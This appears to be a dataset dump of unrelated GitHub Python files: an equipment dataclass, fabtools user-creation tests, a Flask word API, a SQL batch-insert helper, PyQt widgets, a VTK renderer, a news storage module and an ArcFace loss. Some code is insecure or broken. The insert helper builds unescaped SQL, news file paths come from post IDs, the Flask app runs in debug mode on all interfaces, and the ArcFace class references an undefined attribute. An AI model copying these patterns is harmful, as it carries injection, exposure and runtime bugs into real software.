3), fill=third_color, width=2)\n draw.line((size[0] / 3 * 2, size[1] / 4 * 3 + 4, size[0] / 3 * 2, size[1] / 4 * 3), fill=third_color, width=2)\n\n hin.save('./img/hint.png', 'PNG')\n\n return\n\n\nmain()\n","repo_name":"SimonDebray/emotional-art","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71524144886","text":"from dataclasses import dataclass, field\nfrom typing import List, Literal\nfrom datetime import datetime\nfrom . import nested_objects, reference_attribute\n\nSTATUS = Literal['updated', 'new', 'empty', 'not updated']\n\n\n@dataclass\nclass Equipment:\n\n toir_id: str\n level: int\n parent_toir_id: str\n name: str\n operating: float\n object_type: str\n departament: reference_attribute.ReferenceAttribute\n typical_object: reference_attribute.ReferenceAttribute\n toir_url: str\n parent_object: object = None\n tech_number: str = None\n registration_number: str = None\n commodity_producer: str = None\n commodity_number: str = None\n operation_date: datetime = None\n category: str = None\n replaced: bool = False\n object_id: str = None\n\n properties: List[nested_objects.Property] = field(default_factory=list)\n fact_repairs: List[nested_objects.FactRepair] = field(default_factory=list)\n plan_repairs: List[nested_objects.PlanRepair] = field(default_factory=list)\n failures: List[nested_objects.Failure] = field(default_factory=list)\n parts: List[nested_objects.Part] = field(default_factory=list)\n movements: List[nested_objects.Movement] = field(default_factory=list)\n\n self_id: str = None\n update_status: STATUS = 'empty'\n\n def __str__(self):\n return f'{self.name}, {self.toir_id}'\n\n @property\n def unique_id(self):\n return self.toir_id\n\n @property\n def parent_id(self):\n return self.parent_object.self_id if self.parent_object else None\n\n def get_nested_objects(self):\n return [\n self.properties,\n self.fact_repairs,\n self.plan_repairs,\n self.failures,\n self.parts,\n ]\n\n @property\n def nested_objects_map(self):\n nested_objects = [\n {'nested_object': 'property', 'attribute_name': 'properties'},\n {'nested_object': 'plan_repair', 'attribute_name': 'plan_repairs'},\n {'nested_object': 'fact_repair', 'attribute_name': 'fact_repairs'},\n {'nested_object': 'failure', 'attribute_name': 'failures'},\n {'nested_object': 'part', 'attribute_name': 'parts'},\n ]\n return nested_objects\n\n def to_compare_dict(self) -> dict:\n return {\n 'toir_id': self.toir_id,\n 'name': self.name,\n 'toir_url': self.toir_url,\n 'tech_number': self.tech_number,\n 'registration_number': self.registration_number,\n 'commodity_producer': self.commodity_producer,\n 'commodity_number': self.commodity_number,\n 'object_id': self.object_id,\n 'departament': self.departament.comparison_value,\n 'typical_object': self.typical_object.comparison_value,\n 'category': self.category,\n }\n\n def to_dict(self) -> dict:\n return {\n 'toir_id': self.toir_id,\n 'level': self.level,\n 'parent_toir_id': self.parent_toir_id,\n 'name': self.name,\n 'operating': self.operating,\n 'departament_id': self.departament.toir_id,\n 'object_type_id': self.typical_object.toir_id,\n 'toir_url': self.toir_url,\n 'tech_number': self.tech_number,\n 'registration_number': self.registration_number,\n 'commodity_producer': self.commodity_producer,\n 'commodity_number': self.commodity_number,\n 'operation_date': self.operation_date,\n 'category': self.category,\n 'self_id': 
self.self_id,\n 'update_status': self.update_status,\n 'replaced': self.replaced,\n }\n\n @classmethod\n def from_dict(cls, data: dict):\n return Equipment(\n toir_id=data.get('toir_id'),\n level=data.get('level'),\n parent_toir_id=data.get('parent_toir_id'),\n name=data.get('name'),\n operating=data.get('operating'),\n departament=data.get('departament_id'),\n typical_object=data.get('object_type_id'),\n toir_url=data.get('toir_url'),\n tech_number=data.get('tech_number'),\n registration_number=data.get('registration_number'),\n commodity_producer=data.get('commodity_producer'),\n commodity_number=data.get('commodity_number'),\n operation_date=data.get('operation_date'),\n self_id=data.get('self_id'),\n category=data.get('category'),\n replaced=data.get('replaced'),\n object_type='equipment',\n )\n","repo_name":"sdregster/toir_integration","sub_path":"domain/entities/equipment.py","file_name":"equipment.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25653574321","text":"import os\n\nfrom fabric.api import run\n\n\nfrom fabtools.files import is_dir\nfrom fabtools.utils import run_as_root\n\n\ndef test_create_user_without_home_directory():\n\n from fabtools.user import create, exists\n\n try:\n create('user1', create_home=False)\n\n assert exists('user1')\n assert not is_dir('/home/user1')\n\n finally:\n run_as_root('userdel -r user1', warn_only=True)\n\n\ndef test_create_user_with_default_home_directory():\n\n from fabtools.user import create, exists\n\n try:\n create('user2')\n\n assert exists('user2')\n assert is_dir('/home/user2')\n\n finally:\n run_as_root('userdel -r user2', warn_only=True)\n\n\ndef test_create_user_with_home_directory():\n\n from fabtools.user import create, exists\n\n try:\n create('user3', home='/tmp/user3')\n\n assert exists('user3')\n assert not is_dir('/home/user3')\n assert is_dir('/tmp/user3')\n\n finally:\n run_as_root('userdel -r user3', warn_only=True)\n\n\ndef test_create_system_user_without_home_directory():\n\n from fabtools.user import create, exists\n\n try:\n create('user4', system=True)\n\n assert exists('user4')\n assert not is_dir('/home/user4')\n\n finally:\n run_as_root('userdel -r user4', warn_only=True)\n\n\ndef test_create_system_user_with_home_directory():\n\n from fabtools.user import create, exists\n\n try:\n create('user5', system=True, create_home=True, home='/var/lib/foo')\n\n assert exists('user5')\n assert is_dir('/var/lib/foo')\n\n finally:\n run_as_root('userdel -r user5', warn_only=True)\n\n\ndef test_create_two_users_with_the_same_uid():\n\n from fabtools.user import create, exists\n\n create('user6', uid='2000')\n assert exists('user6')\n\n create('user7', uid='2000', non_unique=True)\n assert exists('user7')\n\n uid6 = int(run(\"id -u user6\"))\n uid7 = int(run(\"id -u user7\"))\n assert uid7 == uid6 == 2000\n\n run_as_root('userdel -r user6')\n assert not exists('user6')\n\n run_as_root('userdel -r user7')\n assert not exists('user7')\n\n\ndef test_require_user_without_home():\n\n from fabtools.require import user\n from fabtools.user import exists\n\n try:\n user('req1', create_home=False)\n\n assert exists('req1')\n assert not is_dir('/home/req1')\n\n # require again\n user('req1')\n\n finally:\n run_as_root('userdel -r req1', warn_only=True)\n\n\ndef test_require_user_with_default_home():\n\n from fabtools.require import user\n from fabtools.user import exists\n\n try:\n user('req2', create_home=True)\n\n assert 
exists('req2')\n assert is_dir('/home/req2')\n\n finally:\n run_as_root('userdel -r req2', warn_only=True)\n\n\ndef test_require_user_with_custom_home():\n\n from fabtools.require import user\n from fabtools.user import exists\n\n try:\n user('req3', home='/home/other')\n\n assert exists('req3')\n assert not is_dir('/home/req3')\n assert is_dir('/home/other')\n\n finally:\n run_as_root('userdel -r req3', warn_only=True)\n\n\ndef test_require_user_with_ssh_public_keys():\n\n from fabtools.user import authorized_keys\n from fabtools.require import user\n\n try:\n tests_dir = os.path.dirname(os.path.dirname(__file__))\n public_key_filename = os.path.join(tests_dir, 'id_test.pub')\n public_key_filename2 = os.path.join(tests_dir, 'id_test2.pub')\n multiple_public_key_filename = \\\n os.path.join(tests_dir, 'test_authorized_keys')\n\n with open(public_key_filename) as public_key_file:\n public_key = public_key_file.read().strip()\n\n with open(public_key_filename2) as public_key_file:\n public_key2 = public_key_file.read().strip()\n\n user('req4', home='/tmp/req4', ssh_public_keys=public_key_filename)\n\n keys = authorized_keys('req4')\n assert keys == [public_key]\n\n # let's try add same keys second time\n user('req4', home='/tmp/req4', ssh_public_keys=public_key_filename)\n\n keys = authorized_keys('req4')\n\n # Now add a file with multiple public keys\n user('req5', home='/tmp/req5',\n ssh_public_keys=multiple_public_key_filename)\n\n keys = authorized_keys('req5')\n assert keys == [public_key, public_key2], keys\n\n # Now adding them individually or again shouldn't affect anything\n user('req5', home='/tmp/req5', ssh_public_keys=[\n public_key_filename2,\n public_key_filename,\n multiple_public_key_filename\n ])\n\n keys = authorized_keys('req5')\n assert keys == [public_key, public_key2], keys\n\n finally:\n run_as_root('userdel -r req4', warn_only=True)\n","repo_name":"fabtools/fabtools","sub_path":"fabtools/tests/functional_tests/test_users.py","file_name":"test_users.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","stars":1258,"dataset":"github-code","pt":"76"} +{"seq_id":"35586447740","text":"from flask_api import FlaskAPI\nimport random\n\napp = FlaskAPI(__name__)\n\nkelimeler =[]\nwith open('static/kelimeler.txt',encoding='utf-8') as fd:\n for kelime in fd:\n kelimeler.append(kelime.strip())\n\ndef get_random_kelime(say):\n if say is None: n = 1\n else: n = say\n if n<1: n = 1\n elif n>10: n = 10\n\n sayilar = []\n for m in range(n):\n sayilar.append(random.randrange(len(kelimeler)))\n\n kelimelist=[]\n for m in range(n):\n kelimelist.append(kelimeler[sayilar[m]])\n return kelimelist\n \ndef kelime_yolla():\n return {\n\t'sayı': 0,\n 'text': get_random_kelime(1)[0]\n }\n\n@app.route(\"/\", methods=['GET'])\ndef bos_kelime_listesi():\n liste = {'0':'Lütfen doğru parametre girin'}\n return liste\n\n@app.route(\"//\", methods=['GET'])\ndef kelime_listesi(key):\n kelimelist = get_random_kelime(key)\n liste = {}\n for i in range(len(kelimelist)):\n liste[i]=kelimelist[i]\n return liste\n\n@app.route(\"/kelime/\", methods=['GET'])\ndef tek_kelime():\n return kelime_yolla()\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=11713,debug=True)\n\n","repo_name":"ahmetax/derlemtr","sub_path":"apim.py","file_name":"apim.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"tr","doc_type":"code","stars":39,"dataset":"github-code","pt":"76"} +{"seq_id":"16162974490","text":"\nclass 
BatchInsert(object):\n\t\"\"\"Helper to do batch inserts\"\"\"\n\t\n\tdef __init__(self, cursor, table, columns = None, batch_size = 1000, lock_table = None):\n\t\tself.__cursor = cursor\n\t\tself.table = table\n\t\tself.columns = columns\n\n\t\tif columns is not None:\n\t\t\tself.__insert_sql = u\"INSERT INTO {} ({}) VALUES\".format(table, \", \".join(columns))\n\t\telse:\n\t\t\tself.__insert_sql = u\"INSERT INTO {} VALUES\".format(table)\n\n\t\tself.batch_size = batch_size\n\n\t\tif lock_table is not None:\n\t\t\tlock_table = lock_table.upper()\n\t\t\tif lock_table not in [\"READ\", \"WRITE\"]:\n\t\t\t\traise Exception(\"lock_table should be one of READ or WRITE\")\n\t\t\n\t\tself.lock_table = lock_table\n\n\t\tself.count = 0\n\t\tself.__sql = []\n\n\t\tif self.lock_table is not None:\n\t\t\tself.__cursor.execute(\"LOCK TABLES {} {}\".format(self.table, self.lock_table))\n\n\tdef __execute(self):\n\t\tif len(self.__sql) == 0:\n\t\t\treturn\n\n\t\tsql = u\"\".join(self.__sql).encode(\"utf-8\", \"replace\")\n\t\t#print sql\n\n\t\tself.__cursor.execute(sql)\n\t\t#print \"Affected rows: {0}\".format(self.__cursor.rowcount)\n\n\tdef __marshall_data(self, data):\n\t\tsb = []\n\t\tfor v in data:\n\t\t\tif v is None:\n\t\t\t\tsb += [u\"NULL\"]\n\t\t\telif isinstance(v, basestring):\n\t\t\t\tsb += [u\"'\" + v + u\"'\"]\n\t\t\telse:\n\t\t\t\tsb += [str(v)]\n\n\t\treturn u\",\".join(sb)\n\n\tdef insert(self, *data):\n\t\tif self.count % self.batch_size == 0:\n\t\t\tself.__execute()\n\n\t\t\tself.__sql = [self.__insert_sql, u\"\\n\\t(\", self.__marshall_data(data), u\")\"]\n\t\telse:\n\t\t\tself.__sql += [u\",\\n\\t(\", self.__marshall_data(data), u\")\"]\n\n\t\tself.count += 1\n\n\tdef close(self):\n\t\tself.__execute()\n\n\t\tif self.lock_table is not None:\n\t\t\tself.__cursor.execute(\"UNLOCK TABLES\")","repo_name":"chris-zen/phd-thesis","sub_path":"chapter2/intogen-arrays/lib/intogen/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"42250209890","text":"# Contenedor de temperáturas\nTemMaxList = []\nTemMinList = []\n# contador de días\ndias = 0\ndiasMinErr = 0\ndiasMaxErr = 0\ndiasTwoErr = 0\ndiasErr = 0\n# Medias\nMediaTempMax = 0\nMediaTempMin = 0\n# Promedio días errados\ndiasErrProm = 0\n\n# Capturando datos para comparación de while\nTempMax = int(input('Ingresa la temperatura máxima: '))\nTempMin = int(input('Ingresa la temperatura mínima: '))\n\n# while ciclo repetitivo\nwhile TempMax != 0 and TempMin != 0:\n # Almacenando datos en las listas\n TemMaxList.append(TempMax)\n TemMinList.append(TempMin)\n # Contador de número de días\n dias += 1\n # Capturando datos para no quedar en ciclo infinito\n TempMax = int(input('Ingresa la temperatura máxima: '))\n TempMin = int(input('Ingresa la temperatura mínima: '))\n\n# for que iterara las dos listas, ZIP es una función de python que une las dos listas y muestra el resultado como\n# tupla en el orden que se requiera\nfor i in zip(TemMaxList, TemMinList):\n\n if i[0] > 35 and i[1] >= 5:\n diasMaxErr += 1\n elif i[0] <= 35 and i[1] < 5:\n diasMinErr += 1\n elif i[0] > 35 and i[1] < 5:\n diasTwoErr += 1\n else:\n MediaTempMin = MediaTempMin + i[1]\n MediaTempMax = MediaTempMax + i[0]\n\n# DIAS TOTALES DE ERROR\ndiasErr = diasMinErr + diasMaxErr + diasTwoErr\n\n# MEDIA TEMPERATURAS\nMediaTempMax = MediaTempMax/(dias-diasErr)\nMediaTempMin = MediaTempMin/(dias-diasErr)\n\n# PROMEDIO ERROR CON RESPECTO AL TOTAL DE 
DÍAS\ndiasErrProm = (diasErr/dias)*100\n\nprint(dias)\nprint(diasErr)\nprint(diasMinErr)\nprint(diasMaxErr)\nprint(diasTwoErr)\nprint(MediaTempMax)\nprint(MediaTempMin)\nprint(diasErrProm)","repo_name":"Camilo-Arias/KnowingPython","sub_path":"retoS4.py","file_name":"retoS4.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2824666049","text":"from PyQt5 import QtCore\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QPushButton\n\nfrom Exceling.globals.colors import ColorsBackend\nfrom Exceling.logo.Logo import Frame\nfrom Exceling.settings.changeColors import ChangeColors\n\n\nclass LeftButtons(QWidget):\n def __init__(self, parent):\n super().__init__(parent)\n\n mainLayout = QVBoxLayout()\n colors = ColorsBackend().sidebar()\n btn1 = Button(self, parent, colors, \"Recent\")\n btn2 = Button(self, parent, colors, \"Add\")\n btn3 = Button(self, parent, colors, \"About\")\n self.buttons = [btn1, btn2, btn3]\n mainLayout.addWidget(Frame(\"Image1\", 80, 80, 5, 5, 5, 10), alignment=QtCore.Qt.AlignHCenter)\n mainLayout.addWidget(btn1)\n mainLayout.addWidget(btn2)\n mainLayout.addWidget(btn3)\n mainLayout.setSpacing(0)\n mainLayout.addStretch(5)\n mainLayout.setContentsMargins(0, 0, 0, 0)\n self.setContentsMargins(0, 0, 0, 0)\n\n self.setLayout(mainLayout)\n\n\nclass Button(QPushButton):\n def __init__(self, parent, grandparent, color, text):\n super().__init__(parent)\n self.grandparent = grandparent\n bg, textC, focused, hover = color\n self.setObjectName(\"rightButtons\")\n self.setText(text)\n self.bg = bg\n self.textC = textC\n self.hover = hover\n self.focused = focused\n self.parent = parent\n self.change = ChangeColors(\"sidebar()\")\n self.setFont(QFont(\"Arial\", 17))\n self.setMinimumSize(90, 30)\n\n self.setContentsMargins(0, 0, 0, 0)\n if text != \"Recent\":\n self.setStyleSheet(\n self.getStyle(bg, textC, hover)\n )\n else:\n self.setStyleSheet(self.getStyle(focused, textC, focused))\n\n def getStyle(self, bg, text, hover):\n return \"\"\"\n #rightButtons {{\n border: none;\n background: {};\n color: {};\n }}\n #rightButtons:hover {{\n background: {};\n }}\n \"\"\".format(bg, text, hover)\n\n def mousePressEvent(self, e):\n super().mousePressEvent(e)\n for button in self.parent.buttons:\n button.setStyleSheet(self.getStyle(self.bg, self.textC, self.hover))\n self.setStyleSheet(self.getStyle(self.focused, self.textC, self.focused))\n if self.text() == \"Recent\":\n self.grandparent.firstTab()\n\n def mouseDoubleClickEvent(self, event):\n if not self.change.isVisible():\n self.change.show()\n","repo_name":"Arya-Programmer/Excel-Automation","sub_path":"Exceling/settings/leftButtons.py","file_name":"leftButtons.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70866394485","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis class is inspired by ROI3DSnake.java class of bigsnake3d plugin\nfrom Biomedical Imaging Group. 
\n\nDesigned to be run in Python 3 virtual environment 3.7_vtk\n\nRendering of a Snake surface in VTK\n\n@version: June 10, 2019\n@author: Yoann Pradat\n\"\"\"\n\nfrom vtk import vtkRenderer\nfrom vtk import vtkRenderWindow\nfrom vtk import vtkRenderWindowInteractor\n\nfrom auxiliary.auxVtk import *\n\nclass ROI3DSnake(object):\n def __init__(self, snake, scaleSubsampling=1):\n self.snake = snake\n self.scaleSubsampling = scaleSubsampling\n\n self.pixelSizeX = 1\n self.pixelSizeY = 1\n self.pixelSizeZ = 1\n\n # vtkRenderer\n self.renderer = vtkRenderer()\n\n def _getScaledPoints(self, coordinates, scaleX, scaleY, scaleZ):\n \"\"\"\n Parameters\n ----------\n coordinates: np.array (n_coordinates, 3)\n scaleX, scaleY, scaleZ: int\n \n Return\n ---------\n result: vktPoints vector of size (n_coordinates*3, 1)\n \"\"\"\n n_coordinates = coordinates.shape[0]\n result = vtkPoints()\n if n_coordinates < 1:\n return result\n coordinatesVector = np.zeros((n_coordinates*3, 1), dtype=float)\n for i in range(n_coordinates):\n coordinatesVector[3*i, 0] = coordinates[i, 0]*scaleX\n coordinatesVector[3*i+1, 0] = coordinates[i, 1]*scaleY\n coordinatesVector[3*i+2, 0] = coordinates[i, 2]*scaleZ\n \n # vtkDoubleArray\n array = vtk_np.numpy_to_vtk(coordinatesVector)\n array.SetNumberOfComponents(3)\n result.SetData(array)\n return result\n\n def _nodeToWorldScale(self, coordinates, scaleX, scaleY, scaleZ):\n scaledPoint = np.array([coordinates[0]*scaleX, coordinates[1]*scaleY, coordinates[2]*scaleZ])\n return scaledPoint\n\n def _createNodesActors(self, renderer):\n nodes = self.snake.getNodes()\n for i in range(0, len(nodes)):\n if nodes[i].hidden:\n pass\n else:\n # Create sphere at nodes coordinates\n sphereNode = vtkSphereSource()\n nodePos = nodes[i].getCoordinates()\n sphereNode.SetCenter(self._nodeToWorldScale(nodePos, self.pixelSizeX, self.pixelSizeY, self.pixelSizeZ))\n\n sphereNode.SetRadius(self.pixelSizeX/50)\n sphereNode.SetThetaResolution(25)\n sphereNode.SetPhiResolution(25)\n\n sphereNode.Update()\n\n # Get vtkPolyData from sphere\n nodeData = sphereNode.GetOutput()\n\n # Set nodeData to mapper\n nodeMapper = vtkPolyDataMapper()\n nodeMapper.SetInputData(nodeData)\n\n # Set nodeMapper to actor and add actor to the renderer\n nodeActor = vtkActor()\n \n color = nodes[i].getColor()\n red = color.getRed()\n green = color.getGreen()\n blue = color.getBlue()\n nodeActor.GetProperty().SetColor(red/255., green/255., blue/255.)\n\n nodeActor.SetMapper(nodeMapper)\n renderer.AddActor(nodeActor)\n\n def _init3DRenderer(self, renderer):\n scales = self.snake.getScales()\n for i in range(0, len(scales), self.scaleSubsampling):\n scale = scales[i]\n scalePoints = scale.getCoordinates()\n\n # Scale points and Python conversion to vktPoints and scaling\n points = self._getScaledPoints(scalePoints, self.pixelSizeX, self.pixelSizeY, self.pixelSizeZ)\n\n cells = vtkCellArray()\n num_segments = scalePoints.shape[0]-1\n \n if scale.isClosed():\n num_segments += 1\n \n lineIdx = np.zeros((num_segments, 2), dtype=np.int32)\n for j in range(num_segments):\n lineIdx[j] = [j, j+1]\n\n if scale.isClosed():\n lineIdx[num_segments-1] = [0, num_segments-1]\n\n # Create cells and Python conversion to vktCellArray\n cells = getCells(num_segments, prepareCells(lineIdx))\n scaleData = vtkPolyData()\n\n # Set vertices and lines to scaleData\n scaleData.SetPoints(points)\n scaleData.SetLines(cells)\n\n # Set scaleData to mapper\n polyMapper = vtkPolyDataMapper()\n polyMapper.SetInputData(scaleData)\n\n # Set mapper to actor 
and add actor to the renderer\n lineActor = vtkActor()\n\n color = scale.getColor()\n red = color.getRed()\n green = color.getGreen()\n blue = color.getBlue()\n lineActor.GetProperty().SetColor(red/255., green/255., blue/255.)\n \n lineActor.SetMapper(polyMapper)\n renderer.AddActor(lineActor)\n\n # display control points on 3D vtk renderer\n self._createNodesActors(renderer)\n\n painter3Dintialized=True\n\n def displaySnake(self, renWinSize=(900, 900)):\n # Creates vtkRenderWindow and set size\n renWin = vtkRenderWindow()\n renWin.SetSize(renWinSize[0], renWinSize[1])\n \n # Creates interactive window\n iren = vtkRenderWindowInteractor()\n iren.SetRenderWindow(renWin)\n\n # Add actors to the renderer\n self._init3DRenderer(self.renderer)\n\n # Add renderer to the window\n renWin.AddRenderer(self.renderer)\n\n # Set Background and camera parameters\n self.renderer.SetBackground(1, 1, 1)\n self.renderer.GetActiveCamera().SetFocalPoint(0, 0, 0)\n self.renderer.GetActiveCamera().SetPosition(1, 0, 0)\n self.renderer.GetActiveCamera().SetViewUp(0, 0, 1)\n self.renderer.ResetCamera()\n self.renderer.GetActiveCamera().Azimuth(20)\n self.renderer.GetActiveCamera().Elevation(30)\n self.renderer.GetActiveCamera().Dolly(1.2)\n self.renderer.ResetCameraClippingRange()\n \n iren.Initialize()\n renWin.Render()\n iren.Start()\n renWin.Render()\n \n","repo_name":"ypradat/EbiUhlmann","sub_path":"source/python/roi/ROI3DSnake.py","file_name":"ROI3DSnake.py","file_ext":"py","file_size_in_byte":6143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37444210162","text":"import json\nimport logging\nimport os\nfrom datetime import datetime\nfrom flask_sqlalchemy_cache import FromCache\nfrom houraiteahouse.storage import auth_storage as auth\nfrom houraiteahouse.storage import storage_util as util\nfrom houraiteahouse.storage import models\nfrom houraiteahouse.storage.models import db, cache\nfrom werkzeug.exceptions import Forbidden\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_LANGUAGE = 'en_US'\n\n\ndef sanitize_body(body):\n return body.replace('\\n', '
    ') # replace linebreaks with HTML breaks\n\n\ndef get_language(language=DEFAULT_LANGUAGE):\n try:\n lang = models.Language.get(language_code=language)\n except Exception:\n logger.warning('Unrecognized language code {}'.format(language))\n lang = models.Language.get(language_code=DEFAULT_LANGUAGE)\n return lang\n\n\ndef list_news(language=DEFAULT_LANGUAGE):\n news = models.NewsPost.query.order_by(models.NewsPost.created.desc()) \\\n .options(FromCache(cache)).all()\n if news is None:\n return None\n return [news_to_dict(post, language=language) for post in news]\n\n\ndef open_news_file(postId, language=DEFAULT_LANGUAGE, filemode='r'):\n post_path = os.path.join('/var/htwebsite/news/', language, postId)\n return open(post_path, filemode)\n\n\ndef tagged_news(tag, language=DEFAULT_LANGUAGE):\n tag = models.NewsTag.get(name=tag)\n if tag is None or tag.news is None:\n return None\n return [news_to_dict(post, language=language) for post in tag.news]\n\n\n# \"postId\" is a misnomer, it's actually the short title\n# (ie, [date]-shortened-title)\ndef get_news(postId, session_id, language=DEFAULT_LANGUAGE):\n news = models.NewsPost.get_or_die(post_short=postId)\n caller = None\n if session_id:\n caller = auth.get_user_session(session_id).user\n\n ret = news_to_dict(news, caller, language)\n\n # TODO(james7132): Make this configurable\n with open_news_file(postId, language=language) as news_file:\n ret['body'] = news_file.read()\n\n return ret\n\n\ndef post_news(title, body, tags, session_id, media=None,\n language=DEFAULT_LANGUAGE):\n lang = get_language(language)\n\n tagObjs = [get_tag(name) for name in tags]\n\n author = auth.get_user_session(session_id).user\n if not author:\n return None\n\n body = sanitize_body(body)\n\n created = datetime.utcnow()\n shortTitle = readDate(created) + '-' + title.replace(' ', '-')[:53]\n with open_news_file(shortTitle, language, filemode='w') as news_file:\n news_file.write(body)\n\n news = models.NewsPost(shortTitle, title, created, author, tagObjs, media)\n\n postTitle = models.NewsTitle(news, lang, title)\n\n util.try_add(news=news, logger=logger)\n return get_news(shortTitle, session_id, language)\n\n\ndef edit_news(post_id, title, body, session_id, media,\n language=DEFAULT_LANGUAGE):\n news = models.NewsPost.get_or_die(post_short=post_id)\n caller = auth.get_user_session(session_id).user\n if caller != news.author:\n raise Forbidden\n\n body = sanitize_body(body)\n\n with open_news_file(news.post_short, language, filemode='w') as news_file:\n news_file.write(body)\n\n news.title = title\n news.media = media\n news.lastEdit = datetime.utcnow()\n\n ret = news_to_dict(news, caller)\n\n util.try_merge(news=news, logger=logger)\n ret['body'] = body\n return ret\n\n\ndef translate_news(post_id, language, title, body):\n news = models.NewsPost.get_or_die(post_short=post_id)\n lang = get_language(language)\n if not lang:\n return None\n\n body = sanitize_body(body)\n\n with open_news_file(news.post_short, language, filemode='w') as news_file:\n news_file.write(body)\n\n ret = False\n title = models.NewsTitle.get(news=news, language=lang)\n if not title:\n title = models.NewsTitle(news, lang, title)\n ret = True\n\n util.try_add(title=title, logger=logger)\n return ret\n\n\ndef get_tag(name):\n tag = models.NewsTag.get(name=name)\n return tag or create_tag(name)\n\n\ndef create_tag(name):\n tag = models.NewsTag(name)\n util.try_add(tag=tag, logger=logger)\n # It won't be in the cache yet, so we must actually load it.\n return tag\n\n\ndef post_comment(post_id, 
body, session_id):\n news = models.NewsPost.get_or_die(post_short=post_id)\n author = auth.get_user_session(session_id).user\n if not author:\n return None\n ret = {'body': body, 'author': author.username}\n\n body = sanitize_body(body)\n\n comment = models.NewsComment(body, author, news)\n util.try_add(comment=comment, logger=logger)\n return ret\n\n\ndef edit_comment(comment_id, body, session_id):\n comment = models.NewsComment.get_or_die(id=comment_id)\n caller = auth.get_user_session(session_id).user\n if caller != comment.author:\n raise Forbidden\n\n comment.body = sanitize_body(body)\n util.try_merge(comment=comment, logger=logger)\n\n\ndef delete_comment(comment_id, session_id):\n comment = models.NewsComment.get_or_die(id=comment_id)\n caller = auth.get_user_session(session_id).user\n if caller != comment.get_author and not (\n caller.get_permissions().admin or caller.get_permissions().master):\n raise Forbidden\n\n util.try_delete(comment=comment, logger=logger)\n return True\n\n\ndef news_to_dict(news, caller=None, language=DEFAULT_LANGUAGE):\n lang = get_language(language)\n newsDict = {\n 'author': news.author.username,\n 'isAuthor': caller and caller == news.get_author(),\n 'created': str(news.created),\n 'post_id': news.post_short,\n 'tags': [tag.name for tag in news.tags]\n }\n\n title = models.NewsTitle.get(id=news.id, language_id=lang.id)\n newsDict['title'] = title.get_title() or news.title\n\n if news.media:\n newsDict['media'] = news.media\n\n if news.comments:\n newsDict['comments'] = [comment_to_dict(comment, caller)\n for comment in news.comments]\n\n if news.lastEdit:\n newsDict['lastEdit'] = str(news.lastEdit)\n\n return newsDict\n\n\ndef comment_to_dict(comment, caller=None):\n return {\n 'id': comment.comment_id,\n 'author': comment.get_author() .get_username(),\n 'body': comment.body,\n 'isAuthor': caller and caller == comment.get_author()\n }\n\n\ndef readDate(d):\n day = '0' + str(d.day) if d.day < 10 else d.day\n month = '0' + str(d.month) if d.month < 10 else d.month\n return '{0}-{1}-{2}'.format(d.year, month, day)\n","repo_name":"HouraiTeahouse/houraiteahouse.net-backend","sub_path":"src/houraiteahouse/storage/news_storage.py","file_name":"news_storage.py","file_ext":"py","file_size_in_byte":6476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20887986532","text":"# Stolen from ArcFace official implementation (InsightFace) :vvvv\nimport math\nimport torch\n\n\nclass ArcFace(torch.nn.Module):\n\tdef __init__(self, s: float = 64.0, margin: float = 0.5):\n\t\tsuper().__init__()\n\t\tself.scale = s\n\t\tself.margin = margin\n\t\tself.cos_m = math.cos(margin)\n\t\tself.sin_m = math.sin(margin)\n\t\tself.theta = math.cos(math.pi - margin)\n\t\tself.sinmm = math.sin(math.pi - margin) * margin\n\t\tself.easy_margin = False\n\n\tdef forward(self, logits: torch.Tensor, labels: torch.Tensor):\n\t\tindex = torch.where(labels != -1)[0]\n\t\ttarget_logit = logits[index, labels[index].view(-1)]\n\n\t\twith torch.no_grad():\n\t\t\ttarget_logit.arccos_()\n\t\t\tlogits.arccos_()\n\t\t\tfinal_target_logit = target_logit + self.margin\n\t\t\tlogits[index, labels[index].view(-1)] = final_target_logit\n\t\t\tlogits.cos_()\n\t\tlogits = logits * self.s\n\t\treturn logits\n\n\nclass ArcFaceFC(torch.nn.Module):\n\tdef __init__(self, arcface: ArcFace, embedding_size: int, num_classes: int) -> None:\n\t\tsuper().__init__()\n\t\tself.arcface = arcface\n\t\tself.embedding_size = embedding_size\n\t\tself.cross_entropy = 
torch.nn.CrossEntropyLoss()\n\t\tself.weight = torch.nn.Parameter(torch.normal(0.0, 0.01, [num_classes, embedding_size]))\n\n\tdef forward(self, images: torch.Tensor, labels: torch.Tensor) -> torch.Tensor:\n\t\tlabels.squeeze_()\n\t\tlabels = labels.to(torch.long)\n\n\t\tlabels = labels.view(-1, 1)\n\t\tweight = self.weight\n\n\t\tnorm_embeddings = torch.nn.functional.normalize(images)\n\t\tnorm_weight_activated = torch.nn.functional.normalize(weight)\n\t\tlogits = torch.nn.functional.linear(norm_embeddings, norm_weight_activated)\n\n\t\tlogits = logits.clamp(-1, 1)\n\t\tlogits = self.arcface(logits, labels)\n\t\treturn self.cross_entropy(logits, labels)\n","repo_name":"ArinoJenynof/sorghum100-fgvc9","sub_path":"arcface.py","file_name":"arcface.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24649706738","text":"import numpy as np\nimport torch\nfrom torchvision import transforms\nimport cv2\nimport os\nimport 